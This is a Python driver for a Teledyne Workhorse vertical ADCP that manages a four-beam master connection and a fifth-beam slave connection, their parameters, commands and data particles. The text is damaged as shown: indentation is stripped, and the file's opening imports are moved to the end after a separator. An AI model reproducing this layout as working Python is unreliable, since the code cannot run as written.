from mi.core.time_tools import get_timestamp_delayed
from mi.core.util import dict_equal
from mi.core.common import BaseEnum, InstErrorCode
from mi.core.exceptions import InstrumentConnectionException, SampleException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentProtocolException
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentException
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver, DriverEvent
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.port_agent_client import PortAgentClient, PortAgentPacket
from mi.instrument.teledyne.workhorse.driver import WorkhorseParameter
from mi.instrument.teledyne.workhorse.driver import WorkhorsePrompt
from mi.instrument.teledyne.workhorse.driver import NEWLINE
from mi.instrument.teledyne.workhorse.driver import parameter_regexes
from mi.instrument.teledyne.workhorse.driver import parameter_extractors
from mi.instrument.teledyne.workhorse.driver import parameter_formatters
from mi.instrument.teledyne.workhorse.driver import parameter_defaults
from mi.instrument.teledyne.workhorse.driver import parameter_types
from mi.instrument.teledyne.workhorse.driver import parameter_names
from mi.instrument.teledyne.workhorse.driver import parameter_descriptions
from mi.instrument.teledyne.workhorse.driver import parameter_ranges
from mi.instrument.teledyne.workhorse.driver import parameter_startup
from mi.instrument.teledyne.workhorse.driver import parameter_direct
from mi.instrument.teledyne.workhorse.driver import parameter_visibility
from mi.instrument.teledyne.workhorse.driver import parameter_units, WorkhorseProtocol
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolState
from mi.instrument.teledyne.workhorse.driver import WorkhorseInstrumentCommands
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolEvent
from mi.instrument.teledyne.workhorse.driver import ADCP_COMPASS_CALIBRATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_PD0_PARSED_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_TRANSMIT_PATH_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import WorkhorseEngineeringParameter
from mi.instrument.teledyne.workhorse.driver import TIMEOUT
from mi.instrument.teledyne.workhorse.driver import WorkhorseScheduledJob
from mi.instrument.teledyne.workhorse.particles import VADCPDataParticleType, WorkhorseDataParticleType
log = get_logger()
master_parameter_defaults = copy.deepcopy(parameter_defaults)
slave_parameter_defaults = copy.deepcopy(parameter_defaults)
master_parameter_defaults[WorkhorseParameter.TRANSDUCER_DEPTH] = 2000
master_parameter_defaults[WorkhorseParameter.RDS3_MODE_SEL] = 1
master_parameter_defaults[WorkhorseParameter.SYNCH_DELAY] = 100
master_parameter_defaults[WorkhorseParameter.BLANK_AFTER_TRANSMIT] = 88
master_parameter_defaults[WorkhorseParameter.NUMBER_OF_DEPTH_CELLS] = 220
master_parameter_defaults[WorkhorseParameter.DEPTH_CELL_SIZE] = 100
master_parameter_defaults[WorkhorseParameter.TIME_PER_PING] = '00:01.00'
slave_parameter_defaults[WorkhorseParameter.TRANSDUCER_DEPTH] = 2000
slave_parameter_defaults[WorkhorseParameter.RDS3_MODE_SEL] = 2
slave_parameter_defaults[WorkhorseParameter.SYNCH_DELAY] = 0
slave_parameter_defaults[WorkhorseParameter.BLANK_AFTER_TRANSMIT] = 83
slave_parameter_defaults[WorkhorseParameter.NUMBER_OF_DEPTH_CELLS] = 220
slave_parameter_defaults[WorkhorseParameter.DEPTH_CELL_SIZE] = 94
slave_parameter_defaults[WorkhorseParameter.TIME_PER_PING] = '00:00.00'
class SlaveProtocol(BaseEnum):
"""
The protocol needs to have 2 connections, 4Beam(Master) and 5thBeam(Slave)
"""
FOURBEAM = '4Beam'
FIFTHBEAM = '5thBeam'
class InstrumentDriver(SingleConnectionInstrumentDriver):
def __init__(self, evt_callback, refdes=None):
"""
InstrumentDriver constructor.
@param evt_callback Driver process event callback.
"""
SingleConnectionInstrumentDriver.__init__(self, evt_callback, refdes)
# multiple portAgentClient
self._connection = {}
def _build_protocol(self):
"""
Construct the driver protocol state machine.
"""
self._protocol = Protocol(WorkhorsePrompt, NEWLINE, self._driver_event,
connections=[SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM])
def _handler_inst_disconnected_connect(self, *args, **kwargs):
self._build_protocol()
self.set_init_params({})
self._protocol.connections[SlaveProtocol.FOURBEAM] = self._connection[SlaveProtocol.FOURBEAM]
self._protocol.connections[SlaveProtocol.FIFTHBEAM] = self._connection[SlaveProtocol.FIFTHBEAM]
return DriverConnectionState.CONNECTED, None
def _handler_disconnected_connect(self, *args, **kwargs):
"""
Establish communications with the device via port agent / logger and
construct and initialize a protocol FSM for device interaction.
@return (next_state, result) tuple, (DriverConnectionState.CONNECTED, None) if successful.
"""
next_state = DriverConnectionState.INST_DISCONNECTED
result = None
# for Master first
try:
self._connection[SlaveProtocol.FOURBEAM].init_comms()
self._connection[SlaveProtocol.FIFTHBEAM].init_comms()
except InstrumentConnectionException as e:
log.error("Connection Exception: %s", e)
log.error("Instrument Driver returning to unconfigured state.")
next_state = DriverConnectionState.UNCONFIGURED
init_config = {}
if len(args) > 0 and isinstance(args[0], dict):
init_config = args[0]
self.set_init_params(init_config)
return next_state, (next_state, result)
def _handler_connected_disconnect(self, *args, **kwargs):
"""
Disconnect to the device via port agent / logger and destroy the protocol FSM.
@return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None) if successful.
"""
next_state = DriverConnectionState.UNCONFIGURED
result = None
for connection in self._connection.values():
connection.stop_comms()
self._destroy_protocol()
return next_state, (next_state, result)
def _handler_connected_connection_lost(self, *args, **kwargs):
"""
The device connection was lost. Stop comms, destroy protocol FSM and revert to unconfigured state.
@return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None).
"""
for connection in self._connection.values():
connection.stop_comms()
self._destroy_protocol()
return DriverConnectionState.UNCONFIGURED, None
def _build_connection(self, *args, **kwargs):
"""
Constructs and returns a Connection object according to the given
configuration. The connection object is a LoggerClient instance in
this base class. Subclasses can overwrite this operation as needed.
The value returned by this operation is assigned to self._connection
and also to self._protocol._connection upon entering in the
DriverConnectionState.CONNECTED state.
@param all_configs configuration dict
@returns a dictionary of Connection instances, which will be assigned to self._connection
@throws InstrumentParameterException Invalid configuration.
"""
all_configs = kwargs.get('config', None) # via kwargs
if all_configs is None and len(args) > 0:
all_configs = args[0] # via first argument
if all_configs is None:
all_configs = {SlaveProtocol.FOURBEAM: self._get_port_agent_config(self.refdes + '-4'),
SlaveProtocol.FIFTHBEAM: self._get_port_agent_config(self.refdes + '-5')}
for key in all_configs:
if all_configs[key] is None:
raise InstrumentParameterException('No %s port agent config supplied and failed to auto-discover' % key)
connections = {}
for name, config in all_configs.items():
if not isinstance(config, dict):
continue
if 'mock_port_agent' in config:
mock_port_agent = config['mock_port_agent']
# check for validity here...
if mock_port_agent is not None:
connections[name] = mock_port_agent
else:
try:
addr = config['addr']
port = config['port']
cmd_port = config.get('cmd_port')
if isinstance(addr, basestring) and isinstance(port, int) and len(addr) > 0:
callback = functools.partial(self._got_data, connection=name)
connections[name] = PortAgentClient(addr, port, cmd_port, callback,
self._lost_connection_callback)
else:
raise InstrumentParameterException('Invalid comms config dict in build_connections.')
except (TypeError, KeyError) as e:
raise InstrumentParameterException('Invalid comms config dict.. %r' % e)
return connections
def get_direct_config(self):
"""
Note - must override if instrument driver has more than one instrument configuration.
:return: list of dictionaries containing direct access configuration and commands
"""
config = []
if self._protocol:
for idx, connection in enumerate([SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM]):
config.append({})
config[idx] = self._protocol.get_direct_config()
if connection is SlaveProtocol.FOURBEAM:
config[idx]['title'] = 'Beams 1-4'
if connection is SlaveProtocol.FIFTHBEAM:
config[idx]['title'] = '5th Beam'
config[idx]['ip'] = self._port_agent_config.get(connection, {}).get('host', 'uft20')
config[idx]['data'] = self._port_agent_config.get(connection, {}).get('ports', {}).get('da')
config[idx]['sniffer'] = \
self._port_agent_config.get(connection, {}).get('ports', {}).get('sniff')
return config
def _got_data(self, port_agent_packet, connection=None):
if isinstance(port_agent_packet, Exception):
return self._got_exception(port_agent_packet)
if isinstance(port_agent_packet, PortAgentPacket):
packet_type = port_agent_packet.get_header_type()
data = port_agent_packet.get_data()
if packet_type == PortAgentPacket.PORT_AGENT_CONFIG:
try:
paconfig = json.loads(data)
self._port_agent_config[connection] = paconfig
self._driver_event(DriverAsyncEvent.DRIVER_CONFIG, paconfig)
except ValueError as e:
log.exception('Unable to parse port agent config: %r %r', data, e)
elif packet_type == PortAgentPacket.PORT_AGENT_STATUS:
current_state = self._connection_fsm.get_current_state()
if data == 'DISCONNECTED':
self._async_raise_event(DriverEvent.PA_CONNECTION_LOST)
elif data == 'CONNECTED':
if current_state == DriverConnectionState.INST_DISCONNECTED:
self._async_raise_event(DriverEvent.CONNECT)
else:
if connection and self._protocol:
self._protocol.got_data(port_agent_packet, connection=connection)
class Protocol(WorkhorseProtocol):
def __init__(self, prompts, newline, driver_event, connections=None):
"""
Constructor.
@param prompts Enum class containing possible device prompts used for
command response logic.
@param newline The device newline.
@driver_event The callback for asynchronous driver events.
"""
if not type(connections) is list:
raise InstrumentProtocolException('Unable to instantiate multi connection protocol without connection list')
self._param_dict2 = ProtocolParameterDict()
# Construct superclass.
WorkhorseProtocol.__init__(self, prompts, newline, driver_event)
# Create multiple connection versions of the pieces of protocol involving data to/from the instrument
self._linebuf = {connection: '' for connection in connections}
self._promptbuf = {connection: '' for connection in connections}
self._last_data_timestamp = {connection: None for connection in connections}
self.connections = {connection: None for connection in connections}
self.chunkers = {connection: StringChunker(self.sieve_function) for connection in connections}
def _get_response(self, timeout=10, expected_prompt=None, response_regex=None, connection=None):
"""
Overridden to handle multiple port agent connections
"""
if connection is None:
raise InstrumentProtocolException('_get_response: no connection supplied!')
# Grab time for timeout and wait for prompt.
end_time = time.time() + timeout
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
if expected_prompt is None:
prompt_list = self._get_prompts()
else:
if isinstance(expected_prompt, basestring):
prompt_list = [expected_prompt]
else:
prompt_list = expected_prompt
if response_regex is None:
pattern = None
else:
pattern = response_regex.pattern
log.debug('_get_response: timeout=%s, prompt_list=%s, expected_prompt=%r, response_regex=%r, promptbuf=%r',
timeout, prompt_list, expected_prompt, pattern, self._promptbuf)
while time.time() < end_time:
if response_regex:
# noinspection PyArgumentList
match = response_regex.search(self._linebuf[connection])
if match:
return match.groups()
else:
for item in prompt_list:
index = self._promptbuf[connection].find(item)
if index >= 0:
result = self._promptbuf[connection][0:index + len(item)]
return item, result
time.sleep(.1)
raise InstrumentTimeoutException("in InstrumentProtocol._get_response()")
def _do_cmd_resp(self, cmd, *args, **kwargs):
"""
Overridden to handle multiple port agent connections
"""
connection = kwargs.get('connection')
if connection is None:
raise InstrumentProtocolException('_do_cmd_resp: no connection supplied!')
# Get timeout and initialize response.
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
expected_prompt = kwargs.get('expected_prompt', None)
response_regex = kwargs.get('response_regex', None)
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
self._do_cmd_no_resp(cmd, *args, **kwargs)
# Wait for the prompt, prepare result and return, timeout exception
if response_regex:
prompt = ""
result_tuple = self._get_response(timeout,
connection=connection,
response_regex=response_regex,
expected_prompt=expected_prompt)
result = "".join(result_tuple)
else:
(prompt, result) = self._get_response(timeout,
connection=connection,
expected_prompt=expected_prompt)
resp_handler = self._response_handlers.get((self.get_current_state(), cmd),
self._response_handlers.get(cmd, None))
resp_result = None
if callable(resp_handler):
resp_result = resp_handler(result, prompt)
return resp_result
def _send_data(self, data, write_delay=0, connection=None):
if connection is None:
raise InstrumentProtocolException('_send_data: no connection supplied!')
if write_delay == 0:
self.connections[connection].send(data)
else:
for char in data:
self.connections[connection].send(char)
time.sleep(write_delay)
def _do_cmd_no_resp(self, cmd, *args, **kwargs):
"""
Overridden to handle multiple port agent connections
"""
connection = kwargs.get('connection')
if connection is None:
raise InstrumentProtocolException('_do_cmd_no_resp: no connection supplied! %r %r %r' % (cmd, args, kwargs))
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
build_handler = self._build_handlers.get(cmd, None)
if not callable(build_handler):
log.error('_do_cmd_no_resp: no handler for command: %s' % cmd)
raise InstrumentProtocolException(error_code=InstErrorCode.BAD_DRIVER_COMMAND)
cmd_line = build_handler(cmd, *args)
# Wakeup the device, timeout exception as needed
self._wakeup(timeout, connection=connection)
# Clear line and prompt buffers for result, then send command.
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._send_data(cmd_line, write_delay, connection=connection)
def _do_cmd_direct(self, cmd, connection=None):
"""
Issue an untranslated command to the instrument. No response is handled
as a result of the command.
@param cmd The high level command to issue
"""
# Send command.
self._send_data(cmd, connection=connection)
########################################################################
# Incoming data (for parsing) callback.
########################################################################
def got_data(self, port_agent_packet, connection=None):
"""
Called by the instrument connection when data is available.
Append line and prompt buffers.
Also add data to the chunker and when received call got_chunk
to publish results.
:param connection: connection which produced this packet
:param port_agent_packet: packet of data
"""
if connection is None:
raise InstrumentProtocolException('got_data: no connection supplied!')
data_length = port_agent_packet.get_data_length()
data = port_agent_packet.get_data()
timestamp = port_agent_packet.get_timestamp()
log.debug("Got Data: %r %r", connection, data)
log.debug("Add Port Agent Timestamp: %r %s", connection, timestamp)
if data_length > 0:
if self.get_current_state() == DriverProtocolState.DIRECT_ACCESS:
self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)
self.add_to_buffer(data, connection=connection)
self.chunkers[connection].add_chunk(data, timestamp)
(timestamp, chunk) = self.chunkers[connection].get_next_data()
while chunk:
self._got_chunk(chunk, timestamp, connection=connection)
(timestamp, chunk) = self.chunkers[connection].get_next_data()
########################################################################
# Incoming raw data callback.
########################################################################
def got_raw(self, port_agent_packet, connection=None):
"""
Called by the port agent client when raw data is available, such as data
sent by the driver to the instrument, the instrument responses,etc.
:param connection: connection which produced this packet
:param port_agent_packet: packet of data
"""
self.publish_raw(port_agent_packet, connection)
def publish_raw(self, port_agent_packet, connection=None):
pass
def add_to_buffer(self, data, connection=None):
"""
Add a chunk of data to the internal data buffers
buffers implemented as lifo ring buffer
:param data: bytes to add to the buffer
:param connection: connection which produced this packet
"""
# Update the line and prompt buffers.
self._linebuf[connection] += data
self._promptbuf[connection] += data
self._last_data_timestamp[connection] = time.time()
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
if len(self._linebuf[connection]) > self._max_buffer_size():
self._linebuf[connection] = self._linebuf[connection][self._max_buffer_size() * -1:]
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
if len(self._promptbuf[connection]) > self._max_buffer_size():
self._promptbuf[connection] = self._promptbuf[connection][self._max_buffer_size() * -1:]
log.debug("LINE BUF: %r", self._linebuf[connection][-50:])
log.debug("PROMPT BUF: %r", self._promptbuf[connection][-50:])
########################################################################
# Wakeup helpers.
########################################################################
def _send_wakeup(self, connection=None):
"""
Send a wakeup to the device. Overridden by device specific
subclasses.
"""
self.connections[connection].send(NEWLINE)
def _wakeup(self, timeout, delay=1, connection=None):
"""
Clear buffers and send a wakeup command to the instrument
@param timeout The timeout to wake the device.
@param delay The time to wait between consecutive wakeups.
@throw InstrumentTimeoutException if the device could not be woken.
"""
if connection is None:
raise InstrumentProtocolException('_wakeup: no connection supplied!')
# Clear the prompt buffer.
log.trace("clearing promptbuf: %r", self._promptbuf)
self._promptbuf[connection] = ''
# Grab time for timeout.
starttime = time.time()
while True:
# Send a line return and wait a sec.
log.trace('Sending wakeup. timeout=%s', timeout)
self._send_wakeup(connection=connection)
time.sleep(delay)
log.trace("Prompts: %s", self._get_prompts())
for item in self._get_prompts():
log.trace("buffer: %r", self._promptbuf[connection])
log.trace("find prompt: %r", item)
index = self._promptbuf[connection].find(item)
log.trace("Got prompt (index: %s): %r ", index, self._promptbuf[connection])
if index >= 0:
log.trace('wakeup got prompt: %r', item)
return item
log.trace("Searched for all prompts")
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in _wakeup()")
def _build_param_dict(self):
# We're going to build two complete sets of ADCP parameters here
# one set for the master instrument and one for the slave
for param in parameter_regexes:
self._param_dict.add(param,
parameter_regexes.get(param),
parameter_extractors.get(param),
parameter_formatters.get(param),
type=parameter_types.get(param),
display_name=parameter_names.get(param),
description=parameter_descriptions.get(param),
range=parameter_ranges.get(param),
startup_param=parameter_startup.get(param, False),
direct_access=parameter_direct.get(param, False),
visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
default_value=master_parameter_defaults.get(param),
units=parameter_units.get(param))
for param in parameter_regexes:
# Scheduled events are handled by the master
if WorkhorseEngineeringParameter.has(param):
continue
self._param_dict.add(param + '_5th',
r'DONTMATCHMEIMNOTREAL!',
parameter_extractors.get(param),
parameter_formatters.get(param),
type=parameter_types.get(param),
display_name=parameter_names.get(param) + ' (5th beam)',
description=parameter_descriptions.get(param),
range=parameter_ranges.get(param),
startup_param=parameter_startup.get(param, False),
direct_access=parameter_direct.get(param, False),
visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
default_value=slave_parameter_defaults.get(param),
units=parameter_units.get(param))
self._param_dict.set_default(WorkhorseParameter.CLOCK_SYNCH_INTERVAL)
self._param_dict.set_default(WorkhorseParameter.GET_STATUS_INTERVAL)
# now we're going to build a whole 'nother param dict for the slave parameters
# that contain regex values so we can fill them in easily...
for param in parameter_regexes:
# Scheduled events are handled by the master
if WorkhorseEngineeringParameter.has(param):
continue
self._param_dict2.add(param + '_5th',
parameter_regexes.get(param),
parameter_extractors.get(param),
parameter_formatters.get(param))
# #######################################################################
# Private helpers.
# #######################################################################
def _got_chunk(self, chunk, timestamp, connection=None):
"""
The base class got_data has gotten a chunk from the chunker.
Pass it to extract_sample with the appropriate particle
objects and REGEXes.
"""
if ADCP_PD0_PARSED_REGEX_MATCHER.match(chunk):
pd0 = AdcpPd0Record(chunk)
transform = pd0.coord_transform.coord_transform
# Only BEAM transform supported for VADCP
if transform != particles.Pd0CoordinateTransformType.BEAM:
raise SampleException('Received unsupported coordinate transform type: %s' % transform)
if connection == SlaveProtocol.FOURBEAM:
science = particles.VadcpBeamMasterParticle(pd0, port_timestamp=timestamp).generate()
config = particles.AdcpPd0ConfigParticle(pd0, port_timestamp=timestamp).generate()
engineering = particles.AdcpPd0EngineeringParticle(pd0, port_timestamp=timestamp).generate()
else:
science = particles.VadcpBeamSlaveParticle(pd0, port_timestamp=timestamp).generate()
config = particles.VadcpConfigSlaveParticle(pd0, port_timestamp=timestamp).generate()
engineering = particles.VadcpEngineeringSlaveParticle(pd0, port_timestamp=timestamp).generate()
out_particles = [science]
for particle in [config, engineering]:
if self._changed(particle):
out_particles.append(particle)
for particle in out_particles:
self._driver_event(DriverAsyncEvent.SAMPLE, particle)
else:
if connection == SlaveProtocol.FIFTHBEAM:
if self._extract_sample(particles.VadcpCompassCalibrationDataParticle,
ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpSystemConfigurationDataParticle,
ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpAncillarySystemDataParticle,
ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpTransmitPathParticle,
ADCP_TRANSMIT_PATH_REGEX_MATCHER,
chunk,
timestamp):
return
elif connection == SlaveProtocol.FOURBEAM:
if self._extract_sample(particles.AdcpCompassCalibrationDataParticle,
ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpSystemConfigurationDataParticle,
ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpAncillarySystemDataParticle,
ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpTransmitPathParticle,
ADCP_TRANSMIT_PATH_REGEX_MATCHER,
chunk,
timestamp):
return
def _send_break_cmd(self, delay, connection=None):
"""
Send a BREAK to attempt to wake the device.
"""
self.connections[connection].send_break(delay)
def _sync_clock(self, command, date_time_param, timeout=TIMEOUT, delay=1, time_format="%Y/%m/%d,%H:%M:%S"):
"""
Send the command to the instrument to synchronize the clock
@param command set command
@param date_time_param: date time parameter that we want to set
@param timeout: command timeout
@param delay: wakeup delay
@param time_format: time format string for set command
"""
log.info("SYNCING TIME WITH SENSOR.")
for connection in self.connections:
self._do_cmd_resp(command, date_time_param, get_timestamp_delayed("%Y/%m/%d, %H:%M:%S"),
timeout=timeout, connection=connection)
# #######################################################################
# Startup parameter handlers
########################################################################
def _get_params(self, parameters, connection):
command = NEWLINE.join(['%s?' % p for p in parameters]) + NEWLINE
if len(parameters) > 1:
regex = re.compile(r'(%s.*?%s.*?>)' % (parameters[0], parameters[-1]), re.DOTALL)
else:
regex = re.compile(r'(%s.*?>)' % parameters[0], re.DOTALL)
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._do_cmd_direct(command, connection=connection)
return self._get_response(response_regex=regex, connection=connection)
def _update_params(self, *args, **kwargs):
"""
Update the parameter dictionary.
"""
# see if we passed in a list of parameters to query
# if not, use the whole parameter list
parameters = kwargs.get('params')
if parameters is None or WorkhorseParameter.ALL in parameters:
parameters = self._param_dict.get_keys()
# filter out the engineering parameters and ALL
parameters = [p for p in parameters if not WorkhorseEngineeringParameter.has(p) and p != WorkhorseParameter.ALL]
# Get old param dict config.
old_config = self._param_dict.get_config()
if parameters:
# MASTER
master_params = [p for p in parameters if '_5th' not in p]
if master_params:
resp = self._get_params(master_params, SlaveProtocol.FOURBEAM)
self._param_dict.update_many(resp)
# SLAVE
slave_params = [p.replace('_5th', '') for p in parameters if '_5th' in p]
if slave_params:
resp = self._get_params(slave_params, SlaveProtocol.FIFTHBEAM)
self._param_dict2.update_many(resp)
for key, value in self._param_dict2.get_all().iteritems():
self._param_dict.set_value(key, value)
new_config = self._param_dict.get_config()
# Check if there is any changes. Ignore TT
if not dict_equal(new_config, old_config, ['TT']) or kwargs.get('force'):
self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)
def _execute_set_params(self, commands, connection):
if commands:
# we are going to send the concatenation of all our set commands
self._linebuf[connection] = ''
self._do_cmd_direct(''.join(commands), connection=connection)
# we'll need to build a regular expression to retrieve all of the responses
# including any possible errors
if len(commands) == 1:
regex = re.compile(r'(%s.*?)\r\n>' % commands[-1].strip(), re.DOTALL)
else:
regex = re.compile(r'(%s.*?%s.*?)\r\n>' % (commands[0].strip(), commands[-1].strip()), re.DOTALL)
response = self._get_response(response_regex=regex, connection=connection)
self._parse_set_response(response[0], None)
def _set_params(self, *args, **kwargs):
"""
Issue commands to the instrument to set various parameters
"""
self._verify_not_readonly(*args, **kwargs)
params = args[0]
changed = []
old_config = self._param_dict.get_config()
master_commands = []
slave_commands = []
for key, val in params.iteritems():
if WorkhorseEngineeringParameter.has(key):
continue
if val != old_config.get(key):
changed.append(key)
if '_5th' in key:
slave_commands.append(self._build_set_command(
WorkhorseInstrumentCommands.SET, key.replace('_5th', ''), val))
else:
master_commands.append(self._build_set_command(WorkhorseInstrumentCommands.SET, key, val))
self._execute_set_params(master_commands, connection=SlaveProtocol.FOURBEAM)
self._execute_set_params(slave_commands, connection=SlaveProtocol.FIFTHBEAM)
# Handle engineering parameters
force = False
if WorkhorseParameter.CLOCK_SYNCH_INTERVAL in params:
if (params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL] != self._param_dict.get(
WorkhorseParameter.CLOCK_SYNCH_INTERVAL)):
self._param_dict.set_value(WorkhorseParameter.CLOCK_SYNCH_INTERVAL,
params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL])
self.start_scheduled_job(WorkhorseParameter.CLOCK_SYNCH_INTERVAL, WorkhorseScheduledJob.CLOCK_SYNC,
WorkhorseProtocolEvent.SCHEDULED_CLOCK_SYNC)
force = True
if WorkhorseParameter.GET_STATUS_INTERVAL in params:
if (params[WorkhorseParameter.GET_STATUS_INTERVAL] != self._param_dict.get(
WorkhorseParameter.GET_STATUS_INTERVAL)):
self._param_dict.set_value(WorkhorseParameter.GET_STATUS_INTERVAL,
params[WorkhorseParameter.GET_STATUS_INTERVAL])
self.start_scheduled_job(WorkhorseParameter.GET_STATUS_INTERVAL,
WorkhorseScheduledJob.GET_CONFIGURATION,
WorkhorseProtocolEvent.SCHEDULED_GET_STATUS)
force = True
self._update_params(params=changed, force=force)
return None
def _send_break(self, duration=1000, connection=None):
"""
Send a BREAK to attempt to wake the device.
"""
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._send_break_cmd(duration, connection=connection)
self._get_response(expected_prompt=WorkhorsePrompt.BREAK, connection=connection)
def _start_logging(self, timeout=TIMEOUT, connection=None):
"""
Command the instrument to start logging
@param timeout: how long to wait for a prompt
@throws: InstrumentProtocolException if failed to start logging
"""
try:
start = WorkhorseInstrumentCommands.START_LOGGING
# start the slave first, it collects on signal from master
self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FIFTHBEAM)
self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FOURBEAM)
except InstrumentException:
self._stop_logging()
raise
def _stop_logging(self):
# stop the master first (slave only collects on signal from master)
self._send_break(connection=SlaveProtocol.FOURBEAM)
self._send_break(connection=SlaveProtocol.FIFTHBEAM)
def _discover(self, connection=None):
"""
Discover current state; can be COMMAND or AUTOSAMPLE or UNKNOWN.
@throws InstrumentTimeoutException if the device cannot be woken.
@throws InstrumentStateException if the device response does not correspond to
an expected state.
"""
states = set()
command = WorkhorseProtocolState.COMMAND
auto = WorkhorseProtocolState.AUTOSAMPLE
protocol_state = command
for connection in self.connections:
try:
self._wakeup(3, connection=connection)
states.add(command)
except InstrumentException:
states.add(auto)
if len(states) == 1:
# states match, return this state
protocol_state = states.pop()
# states don't match
self._stop_logging()
return protocol_state
def _run_test(self, *args, **kwargs):
kwargs['timeout'] = 30
kwargs['expected_prompt'] = WorkhorsePrompt.COMMAND
result = []
for connection in self.connections:
result.append(connection)
kwargs['connection'] = connection
result.append(self._do_cmd_resp(WorkhorseInstrumentCommands.RUN_TEST_200, *args, **kwargs))
return NEWLINE.join(result)
@contextmanager
def _pause_logging(self):
try:
self._stop_logging()
yield
finally:
self._start_logging()
########################################################################
# COMMAND handlers.
########################################################################
def _handler_command_acquire_status(self, *args, **kwargs):
"""
execute a get status
@return next_state, (next_state, result) if successful.
@throws InstrumentProtocolException from _do_cmd_resp.
"""
next_state = None
super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FOURBEAM)
super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FIFTHBEAM)
result = self.wait_for_particles([VADCPDataParticleType.VADCP_SYSTEM_CONFIGURATION_SLAVE,
VADCPDataParticleType.VADCP_COMPASS_CALIBRATION_SLAVE,
VADCPDataParticleType.VADCP_ANCILLARY_SYSTEM_DATA_SLAVE,
VADCPDataParticleType.VADCP_TRANSMIT_PATH_SLAVE,
WorkhorseDataParticleType.ADCP_SYSTEM_CONFIGURATION,
WorkhorseDataParticleType.ADCP_COMPASS_CALIBRATION,
WorkhorseDataParticleType.ADCP_ANCILLARY_SYSTEM_DATA,
WorkhorseDataParticleType.ADCP_TRANSMIT_PATH])
return next_state, (next_state, result)
def _handler_command_recover_autosample(self):
log.info('PD0 sample detected in COMMAND, not allowed in VADCP. Sending break')
self._stop_logging()
######################################################
# DIRECT_ACCESS handlers
######################################################
def _handler_direct_access_execute_direct(self, data):
next_state = None
result = []
self._do_cmd_direct(data)
# add sent command to list for 'echo' filtering in callback
self._sent_cmds.append(data)
return next_state, (next_state, result)
|
import copy
import functools
import json
import time
import re
from contextlib import contextmanager
import mi.instrument.teledyne.workhorse.particles as particles
from mi.core.log import get_logger
from mi.instrument.teledyne.workhorse.pd0_parser import AdcpPd0Record
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_protocol import RE_PATTERN, DEFAULT_CMD_TIMEOUT, DEFAULT_WRITE_DELAY
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility, ProtocolParameterDict
from mi.core.time_tools import get_timestamp_delayed
from mi.core.util import dict_equal
from mi.core.common import BaseEnum, InstErrorCode
from mi.core.exceptions import InstrumentConnectionException, SampleException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentProtocolException
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentException
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver, DriverEvent
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.port_agent_client import PortAgentClient, PortAgentPacket
from mi.instrument.teledyne.workhorse.driver import WorkhorseParameter
from mi.instrument.teledyne.workhorse.driver import WorkhorsePrompt
from mi.instrument.teledyne.workhorse.driver import NEWLINE
from mi.instrument.teledyne.workhorse.driver import parameter_regexes
